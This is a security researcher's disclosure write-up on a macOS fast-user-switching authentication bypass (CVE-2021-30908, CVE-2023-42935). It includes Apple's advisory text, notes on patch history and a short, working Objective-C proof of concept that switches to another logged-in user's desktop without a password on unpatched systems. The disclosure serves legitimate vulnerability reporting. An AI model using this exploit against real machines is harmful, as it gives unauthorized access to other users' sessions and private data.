In some macOS versions, SLSSessionSwitchToSessionID didn't check the caller's privileges, letting any user switch to another logged-in user's desktop without their password. If Guest was enabled, it could bypass the lock screen.
I reported this in September 2021; it was fixed in macOS 11.6.1 and macOS 12.0.1:
Impact: A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen
Description: An authentication issue was addressed with improved state management.
CVE-2021-30908: ASentientBot
Amusingly, the bug reappeared in macOS Ventura, and it was fixed again in macOS 13.6.4 and macOS 14.1 as CVE-2023-42935.
I received an Apple Security Bounty both times.
It still works on macOS Catalina and older.
Thank you to emma (916253) and ASentientHedgehog for testing on countless versions and helping me navigate the reporting process!
This program will switch to another user's desktop on affected versions.
@import Foundation;
extern const NSString* kCGSSessionIDKey;
extern const NSString* kCGSSessionLongUserNameKey;
NSArray<NSDictionary*>* CGSCopySessionList();
void CGSSessionSwitchToSessionID(int);
int main(int argCount,char** args)
{
if(argCount!=2)
{
NSLog(@"usage: %s <session id>\n",args[0]);
for(NSDictionary* session in CGSCopySessionList())
{
NSLog(@"%@ %@\n",session[kCGSSessionIDKey],session[kCGSSessionLongUserNameKey]);
}
return 1;
}
CGSSessionSwitchToSessionID(@(args[1]).intValue);
}